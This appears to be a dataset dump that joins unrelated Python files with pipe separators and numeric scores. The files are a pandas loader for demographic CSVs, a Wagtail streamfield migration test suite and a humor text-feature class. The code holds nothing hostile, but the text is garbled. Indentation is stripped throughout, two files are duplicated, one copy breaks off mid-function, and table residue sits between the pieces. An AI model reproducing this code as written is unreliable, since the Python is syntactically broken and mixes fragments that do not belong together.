# STATE-LEVEL, GENDER
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fertility/fertility_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# Mortality
years = ['age', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030']
out = pd.DataFrame()
for state in ['DF', 'GO']:
for sex in ['men', 'women']:
p3 = f'mortality/mortality_{sex}_{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ';')
t = t.drop(years, axis=1)
out = pd.concat([out, t], axis=0)
# FPM
out = pd.DataFrame()
for state in ['DF', 'GO']:
p3 = f'fpm/{state}.csv'
t = pd.read_csv(os.path.join(p, p3), ',')
t = read_mun(t, mun, 'cod')
out = pd.concat([out, t], axis=0) | 0.272025 | 0.229298 |
from unittest import mock
from django.apps import apps
from django.test import SimpleTestCase, TestCase
from wagtail.core import blocks
from wagtail.core.models import Page
from wagtail.tests.testapp.models import StreamPage
from v1.tests.wagtail_pages.helpers import save_new_page
from v1.util.migrations import (
get_streamfield_data,
is_page,
migrate_block,
migrate_page_types_and_fields,
migrate_stream_field,
migrate_streamfield_data,
set_streamfield_data,
)
class MigrationsUtilTestCase(TestCase):
def setUp(self):
self.root = Page.objects.get(slug="cfgov")
self.page = StreamPage(title="Test Page", slug="testpage")
save_new_page(self.page, self.root)
set_streamfield_data(
self.page, "body", [{"type": "text", "value": "some text"}]
)
self.revision = self.page.save_revision()
self.page.save()
def test_is_page_page(self):
"""Test that a page is verifably a page"""
self.assertTrue(is_page(self.page))
def test_is_page_revision(self):
"""Test that a revision is verifiably not a page"""
self.assertFalse(is_page(self.revision))
def test_get_streamfield_data_page(self):
"""Test that get_streamfield_data fetches the data correctly
from a page object."""
data = get_streamfield_data(self.page, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
def test_get_streamfield_data_revision(self):
"""Test that get_streamfield_data fetches the data correctly
from a revision object."""
data = get_streamfield_data(self.revision, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
def test_get_streamfield_data_revision_no_field(self):
"""Test that get an empty list for fields that don't exist on
revisions"""
data = get_streamfield_data(self.revision, "notbody")
self.assertEqual(data, [])
def test_set_streamfield_data_page(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data)
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_revision(self):
"""Test that set_streamfield_data correctly sets data for a
given revision and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.revision, "body", new_data)
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_page_without_committing(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
self.page.save = mock.Mock()
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data, commit=False)
self.assertEqual(self.page.save.mock_calls, [])
def test_migrate_stream_field_page(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.page, "body", "text", mapper)
mapper.assert_called_with(self.page, "some text")
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_migrate_stream_field_revision(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.revision, "body", "text", mapper)
mapper.assert_called_with(self.revision, "some text")
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
@mock.patch("v1.util.migrations.set_streamfield_data")
def test_migrate_stream_field_not_migrated(
self, mock_set_streamfield_data
):
"""Test that the migrate_stream_field function correctly
ignores a field that does not have the correct type and
shouldn't be migrated."""
mapper = mock.Mock()
migrate_stream_field(self.page, "body", "other_type", mapper)
# The mapper should not be called
mapper.assert_not_called()
# set_streamfield_data should not be called
mock_set_streamfield_data.assert_not_called()
@mock.patch("v1.util.migrations.migrate_stream_field")
def test_migrate_page_types_and_fields(self, mock_migrate_stream_field):
"""Test that the migrate_page_types_and_fields function
correctly calls the migrate_stream_field function with
the appropriate values from the list of page types and
fields."""
mapper = mock.Mock()
page_types_and_fields = [
("tests", "StreamPage", "body", "text"),
]
migrate_page_types_and_fields(apps, page_types_and_fields, mapper)
        # Check that migrate_stream_field was correctly called with the page
mock_migrate_stream_field.assert_any_call(
self.page, "body", "text", mapper
)
# Check that the revision lookup happened correctly and that the
# revision stream field was correctly migrated.
mock_migrate_stream_field.assert_any_call(
self.revision, "body", "text", mapper
)
class ChildStructBlock(blocks.StructBlock):
text = blocks.CharBlock()
class ChildStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
class TestStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
texts = blocks.ListBlock(blocks.CharBlock())
struct = ChildStructBlock()
stream = ChildStreamBlock()
class MigrateDataTests(SimpleTestCase):
def setUp(self):
self.page = "mock"
self.original_data = [
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
]
self.block = TestStreamBlock()
self.value = self.block.to_python(self.original_data)
self.data = self.value.raw_data
@staticmethod
def mapper(page_or_revision, data):
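        # A deliberately trivial mapper: every block value it visits is
        # replaced with the string "mapped", which makes it easy to see in the
        # assertions below exactly which parts of the stream data were
        # migrated.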
return "mapped"
def test_migrate_data_empty_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_invalid_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "invalid", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_raises_valueerror_on_bad_data(self):
with self.assertRaises(ValueError):
migrate_streamfield_data(
self.page,
("parent", "child"),
[{"type": "parent", "value": "invalid"}],
self.mapper,
)
def test_migrate_data_top_level_block(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "text", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "mapped"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_listblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "texts", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["mapped", "mapped", "mapped"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "struct", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": "mapped"},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("struct", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "mapped"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_streamblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "stream", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{"type": "stream", "value": "mapped"},
],
)
def test_migrate_data_streamblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("stream", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "mapped"},
{"type": "text", "value": "mapped"},
],
},
],
)
def test_migrate_block_migrated_true_if_data_is_modified(self):
def mapper_modifies_data(page_or_revision, data):
data["b"] = "d"
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_modifies_data
)
self.assertTrue(migrated)
self.assertEqual(modified_data, {"a": {"b": "d"}})
    def test_migrate_block_migrated_false_if_data_is_not_modified(self):
def mapper_leaves_data_alone(page_or_revision, data):
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_leaves_data_alone
)
self.assertFalse(migrated)
self.assertEqual(modified_data, {"a": {"b": "c"}}) | cfgov/v1/tests/util/test_migrations.py | from unittest import mock
from django.apps import apps
from django.test import SimpleTestCase, TestCase
from wagtail.core import blocks
from wagtail.core.models import Page
from wagtail.tests.testapp.models import StreamPage
from v1.tests.wagtail_pages.helpers import save_new_page
from v1.util.migrations import (
get_streamfield_data,
is_page,
migrate_block,
migrate_page_types_and_fields,
migrate_stream_field,
migrate_streamfield_data,
set_streamfield_data,
)
class MigrationsUtilTestCase(TestCase):
def setUp(self):
self.root = Page.objects.get(slug="cfgov")
self.page = StreamPage(title="Test Page", slug="testpage")
save_new_page(self.page, self.root)
set_streamfield_data(
self.page, "body", [{"type": "text", "value": "some text"}]
)
self.revision = self.page.save_revision()
self.page.save()
def test_is_page_page(self):
"""Test that a page is verifably a page"""
self.assertTrue(is_page(self.page))
def test_is_page_revision(self):
"""Test that a revision is verifiably not a page"""
self.assertFalse(is_page(self.revision))
def test_get_streamfield_data_page(self):
"""Test that get_streamfield_data fetches the data correctly
from a page object."""
data = get_streamfield_data(self.page, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
def test_get_streamfield_data_revision(self):
"""Test that get_streamfield_data fetches the data correctly
from a revision object."""
data = get_streamfield_data(self.revision, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
def test_get_streamfield_data_revision_no_field(self):
"""Test that get an empty list for fields that don't exist on
revisions"""
data = get_streamfield_data(self.revision, "notbody")
self.assertEqual(data, [])
def test_set_streamfield_data_page(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data)
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_revision(self):
"""Test that set_streamfield_data correctly sets data for a
given revision and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.revision, "body", new_data)
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_page_without_committing(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
self.page.save = mock.Mock()
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data, commit=False)
self.assertEqual(self.page.save.mock_calls, [])
def test_migrate_stream_field_page(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.page, "body", "text", mapper)
mapper.assert_called_with(self.page, "some text")
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_migrate_stream_field_revision(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.revision, "body", "text", mapper)
mapper.assert_called_with(self.revision, "some text")
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
@mock.patch("v1.util.migrations.set_streamfield_data")
def test_migrate_stream_field_not_migrated(
self, mock_set_streamfield_data
):
"""Test that the migrate_stream_field function correctly
ignores a field that does not have the correct type and
shouldn't be migrated."""
mapper = mock.Mock()
migrate_stream_field(self.page, "body", "other_type", mapper)
# The mapper should not be called
mapper.assert_not_called()
# set_streamfield_data should not be called
mock_set_streamfield_data.assert_not_called()
@mock.patch("v1.util.migrations.migrate_stream_field")
def test_migrate_page_types_and_fields(self, mock_migrate_stream_field):
"""Test that the migrate_page_types_and_fields function
correctly calls the migrate_stream_field function with
the appropriate values from the list of page types and
fields."""
mapper = mock.Mock()
page_types_and_fields = [
("tests", "StreamPage", "body", "text"),
]
migrate_page_types_and_fields(apps, page_types_and_fields, mapper)
        # Check that migrate_stream_field was correctly called with the page
mock_migrate_stream_field.assert_any_call(
self.page, "body", "text", mapper
)
# Check that the revision lookup happened correctly and that the
# revision stream field was correctly migrated.
mock_migrate_stream_field.assert_any_call(
self.revision, "body", "text", mapper
)
class ChildStructBlock(blocks.StructBlock):
text = blocks.CharBlock()
class ChildStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
class TestStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
texts = blocks.ListBlock(blocks.CharBlock())
struct = ChildStructBlock()
stream = ChildStreamBlock()
class MigrateDataTests(SimpleTestCase):
def setUp(self):
self.page = "mock"
self.original_data = [
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
]
self.block = TestStreamBlock()
self.value = self.block.to_python(self.original_data)
self.data = self.value.raw_data
@staticmethod
def mapper(page_or_revision, data):
return "mapped"
def test_migrate_data_empty_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_invalid_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "invalid", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_raises_valueerror_on_bad_data(self):
with self.assertRaises(ValueError):
migrate_streamfield_data(
self.page,
("parent", "child"),
[{"type": "parent", "value": "invalid"}],
self.mapper,
)
def test_migrate_data_top_level_block(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "text", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "mapped"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_listblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "texts", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["mapped", "mapped", "mapped"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "struct", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": "mapped"},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("struct", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "mapped"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_streamblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "stream", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{"type": "stream", "value": "mapped"},
],
)
def test_migrate_data_streamblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("stream", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "mapped"},
{"type": "text", "value": "mapped"},
],
},
],
)
def test_migrate_block_migrated_true_if_data_is_modified(self):
def mapper_modifies_data(page_or_revision, data):
data["b"] = "d"
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_modifies_data
)
self.assertTrue(migrated)
self.assertEqual(modified_data, {"a": {"b": "d"}})
    def test_migrate_block_migrated_false_if_data_is_not_modified(self):
def mapper_leaves_data_alone(page_or_revision, data):
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_leaves_data_alone
)
self.assertFalse(migrated)
self.assertEqual(modified_data, {"a": {"b": "c"}}) | 0.781622 | 0.408395 |
import pandas as pd
from humor_features.utils import *
class HumorFeatures:
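    # Each get* method adds one or more feature columns to self.df and returns
    # self, so the calls can be chained; getAllFeatures runs the full pipeline
    # and returns the enriched DataFrame.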
def __init__(self, dataset = None):
self.df = dataset
self.df["text"] = self.df["text"].str.replace("!"," !",regex = False)
self.df["text"] = self.df["text"].str.replace("?"," ?",regex = False)
self.df["text"] = self.df["text"].str.replace("."," .",regex = False)
self.df["text"] = self.df["text"].str.replace(","," ,",regex = False)
self.df['textSeq'] = self.df["text"].apply(lambda ind:text_to_word_sequence(ind,filters='%\n\t01245679',lower=False, split=' '))
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:[word for word in ind if not word in stopwords.words()])
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:lemmatizeSeq(ind))
#self.df['lenSeq'] = self.df["textSeq"].apply(lambda ind: len(ind))
## Structure
def getNumWords(self):
self.df['nbOfWords'] = self.df["textSeq"].apply(lambda ind:len(np.unique(ind)))
return self
def getMeanWordLength(self):
self.df['meanWordLength'] = self.df["textSeq"].apply(lambda ind:getMeanWordLength(ind))
return self
def getTags(self):
self.df['tags'] = self.df["textSeq"].apply(lambda ind: np.array(pos_tag(ind,tagset='universal')))
self.df['tagsNameChange'] = self.df['tags'].apply(lambda tagSeq: np.apply_along_axis(tagRenamer,1,tagSeq) )
self.df['tagged'] = self.df["textSeq"].apply(lambda ind: FreqDist(tag for (word,tag) in pos_tag(ind,tagset='universal')))
return self
def getGrammarRatios(self):
self.df[['Adj ratio','Adv ratio','Noun ratio','Verb ratio']] = pd.DataFrame(self.df['tagged'].apply(getRatios).tolist(), index= self.df.index)
return self
def getPuncCount(self):
self.df[['N. commas','N. fullStops','N. exclamation','N. qstMark']] = pd.DataFrame(self.df['textSeq'].apply(getPuncCount).tolist(),index = self.df.index)
return self
def getEmojiScore(self):
self.df["EmojisScore"] = self.df['text'].apply(emojiScorer)
return self
def getLaughExprCount(self):
self.df['laughingExpr'] = self.df['text'].apply(getLaughingExprCounter)
return self
def getStructure(self):
return self.getNumWords().getMeanWordLength().getTags().getGrammarRatios().getPuncCount().getEmojiScore().getLaughExprCount()
## Frequency
def getFreqMeanMin(self):
self.df[["freqMean","freqMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWordsFreq).tolist(),index = self.df.index)
return self
def getFreqGap(self):
self.df["freqGap"] = self.df['freqMean'] - self.df['freqMin']
return self
def getFreq(self):
return self.getFreqMeanMin().getFreqGap()
## Written - Spoken
def getSpokenFreqs(self):
self.df[["freqSpokenMean", "freqSpokenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getSpokenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqs(self):
self.df[["freqWrittenMean", "freqWrittenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWrittenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqGap(self):
self.df["freqWrittenGap"] = self.df['freqWrittenMean'] - self.df['freqWrittenMin']
return self
def getSpokenFreqGap(self):
self.df["freqSpokenGap"] = self.df['freqSpokenMean'] - self.df['freqSpokenMin']
return self
def getWrittenSpoken(self):
return self.getSpokenFreqs().getWrittenFreqs().getWrittenFreqGap().getSpokenFreqGap()
## Synonyms
def getSynoLowerGreater(self):
self.df[["synoLower","synoGreater","wordLowestSyno","wordGreatestSyno"]] = pd.DataFrame(self.df["textSeq"].apply(getSynoFeaturesSeq).tolist(),index = self.df.index)
return self
def getSynoGaps(self):
self.df["synoLowerGap"] = self.df["wordLowestSyno"] - self.df["synoLower"]
self.df["synoGreaterGap"] = self.df["wordGreatestSyno"] - self.df["synoGreater"]
return self
def getSyno(self):
return self.getSynoLowerGreater().getSynoGaps()
## Sentiment
def getPSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['posSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[0] )
return self
def getNSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['negSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[1] )
return self
def getObjSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['objSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[2] )
return self
def getPSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['posSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[0] )
return self
def getNSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['negSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[1] )
return self
def getObjSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['objSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[2] )
return self
def getPNSentiGap(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns and not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
        if 'posSentiSum' not in self.df.columns:
            self.getPSentiSum()
        if 'negSentiSum' not in self.df.columns:
            self.getNSentiSum()
self.df['posNegGap'] = self.df["posSentiSum"] + self.df["negSentiSum"]
return self
def getSentiment(self):
return self.getPSentiSum().getNSentiSum().getObjSentiSum().getPSentiMean().getNSentiMean().getObjSentiMean().getPNSentiGap()
## Synsets
def getSynsets(self):
self.df[["synsetMean","synsetMax","synsetGap"]] = pd.DataFrame(self.df["textSeq"].apply(getSynsetsMeanMaxGap).tolist(),index = self.df.index)
return self
def getAllFeatures(self):
return self.getStructure().getFreq().getWrittenSpoken().getSyno().getSynsets().getSentiment().df | humor_features/HumorFeatures.py | import pandas as pd
from humor_features.utils import *
class HumorFeatures:
def __init__(self, dataset = None):
self.df = dataset
self.df["text"] = self.df["text"].str.replace("!"," !",regex = False)
self.df["text"] = self.df["text"].str.replace("?"," ?",regex = False)
self.df["text"] = self.df["text"].str.replace("."," .",regex = False)
self.df["text"] = self.df["text"].str.replace(","," ,",regex = False)
self.df['textSeq'] = self.df["text"].apply(lambda ind:text_to_word_sequence(ind,filters='%\n\t01245679',lower=False, split=' '))
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:[word for word in ind if not word in stopwords.words()])
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:lemmatizeSeq(ind))
#self.df['lenSeq'] = self.df["textSeq"].apply(lambda ind: len(ind))
## Structure
def getNumWords(self):
self.df['nbOfWords'] = self.df["textSeq"].apply(lambda ind:len(np.unique(ind)))
return self
def getMeanWordLength(self):
self.df['meanWordLength'] = self.df["textSeq"].apply(lambda ind:getMeanWordLength(ind))
return self
def getTags(self):
self.df['tags'] = self.df["textSeq"].apply(lambda ind: np.array(pos_tag(ind,tagset='universal')))
self.df['tagsNameChange'] = self.df['tags'].apply(lambda tagSeq: np.apply_along_axis(tagRenamer,1,tagSeq) )
self.df['tagged'] = self.df["textSeq"].apply(lambda ind: FreqDist(tag for (word,tag) in pos_tag(ind,tagset='universal')))
return self
def getGrammarRatios(self):
self.df[['Adj ratio','Adv ratio','Noun ratio','Verb ratio']] = pd.DataFrame(self.df['tagged'].apply(getRatios).tolist(), index= self.df.index)
return self
def getPuncCount(self):
self.df[['N. commas','N. fullStops','N. exclamation','N. qstMark']] = pd.DataFrame(self.df['textSeq'].apply(getPuncCount).tolist(),index = self.df.index)
return self
def getEmojiScore(self):
self.df["EmojisScore"] = self.df['text'].apply(emojiScorer)
return self
def getLaughExprCount(self):
self.df['laughingExpr'] = self.df['text'].apply(getLaughingExprCounter)
return self
def getStructure(self):
return self.getNumWords().getMeanWordLength().getTags().getGrammarRatios().getPuncCount().getEmojiScore().getLaughExprCount()
## Frequency
def getFreqMeanMin(self):
self.df[["freqMean","freqMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWordsFreq).tolist(),index = self.df.index)
return self
def getFreqGap(self):
self.df["freqGap"] = self.df['freqMean'] - self.df['freqMin']
return self
def getFreq(self):
return self.getFreqMeanMin().getFreqGap()
## Written - Spoken
def getSpokenFreqs(self):
self.df[["freqSpokenMean", "freqSpokenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getSpokenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqs(self):
self.df[["freqWrittenMean", "freqWrittenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWrittenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqGap(self):
self.df["freqWrittenGap"] = self.df['freqWrittenMean'] - self.df['freqWrittenMin']
return self
def getSpokenFreqGap(self):
self.df["freqSpokenGap"] = self.df['freqSpokenMean'] - self.df['freqSpokenMin']
return self
def getWrittenSpoken(self):
return self.getSpokenFreqs().getWrittenFreqs().getWrittenFreqGap().getSpokenFreqGap()
## Synonyms
def getSynoLowerGreater(self):
self.df[["synoLower","synoGreater","wordLowestSyno","wordGreatestSyno"]] = pd.DataFrame(self.df["textSeq"].apply(getSynoFeaturesSeq).tolist(),index = self.df.index)
return self
def getSynoGaps(self):
self.df["synoLowerGap"] = self.df["wordLowestSyno"] - self.df["synoLower"]
self.df["synoGreaterGap"] = self.df["wordGreatestSyno"] - self.df["synoGreater"]
return self
def getSyno(self):
return self.getSynoLowerGreater().getSynoGaps()
## Sentiment
def getPSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
